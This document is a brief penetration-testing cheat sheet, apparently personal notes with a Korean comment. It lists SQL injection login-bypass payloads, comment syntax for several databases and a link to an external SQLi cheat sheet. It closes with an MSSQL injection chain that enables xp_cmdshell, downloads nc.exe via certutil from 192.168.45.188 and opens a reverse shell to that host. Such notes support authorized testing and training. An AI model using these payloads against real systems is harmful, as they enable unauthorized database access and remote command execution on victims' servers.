```bash # 일단 제일 먼저 single quote로 확인 해보기 ' admin'-- admin'-- - admin' or 1=1 -- admin' or '1'='1 admin' or '1'='1' -- admin' or '1'='1'# admin' or 1=1# admin' or 1=1/* ``` ```sql MySQL #comment -- comment [Note the space after the double dash] /*comment*/ /*! MYSQL Special SQL */ PostgreSQL --comment /*comment*/ MSQL --comment /*comment*/ Oracle --comment SQLite --comment /*comment*/ HQL HQL does not support comments ``` [Pentest Monkey SQLi Cheat Sheet](https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) #### MSSQL SQL Injection -> Reverse Shell ```sql 1';EXEC xp_cmdshell '<POWERSHELL PAYLOAD>';-- ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; -- ';EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;-- ';EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.188/nc.exe C:\windows\temp\nc.exe'; EXEC xp_cmdshell 'C:\windows\temp\nc.exe 192.168.45.188 443 -e cmd.exe';-- ```